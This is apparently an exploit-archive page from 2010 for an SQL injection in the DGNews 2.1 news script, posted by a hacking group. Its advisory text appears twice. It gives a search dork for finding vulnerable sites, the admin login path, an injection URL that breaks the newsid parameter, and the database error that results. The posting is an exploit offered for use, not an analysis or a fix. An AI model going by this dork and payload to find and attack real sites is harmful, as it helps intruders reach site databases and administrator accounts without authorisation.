DGNews 2.1 SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DGNews 2.1 SQL Injection Vulnerability
# Published : 2010-12-29
# Author : kalashnikov
# Previous Title : YourTube v1.0 CSRF Vulnerability (Add User)
# Next Title : News Script PHP Pro (fckeditor) File Upload Vulnerability

#Remote SQL Injection Vulnerability
#name      : DGNews v 2.1
#Author    : kalashnikov
#dork      : inurl:news.php?go=fullnews&newsid
#admincp   : admin/login.php 
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1'
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227===========================
# Site      : http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {26-12-2010}
# Software  : DGNews v 2.1
# Greetz    : just me :L
# team      : VoLc4n0 --=-- stone love --=-- fla$h 

#Remote SQL Injection Vulnerability
#name      : DGNews v 2.1#
Author    : kalashnikov
#dork      : inurl:news.php?go=fullnews&newsid
#admincp   : admin/login.php 
// the user is "admin"===========MYSQL INJ=======
http://localhost/pach/news.php?go=fullnews&newsid=1' 
===========================
Warning: mysql_num_rows(): /home/user/public_html/news.php on line 227
===========================
# Site      : http://vbspiders.com
# Group     : KaLa$nikoV t34m
# Date      : {26-12-2010}# Software  : DGNews v 2.1# Greetz    : just me :L
# team      : VoLc4n0 --=-- stone love --=-- fla$h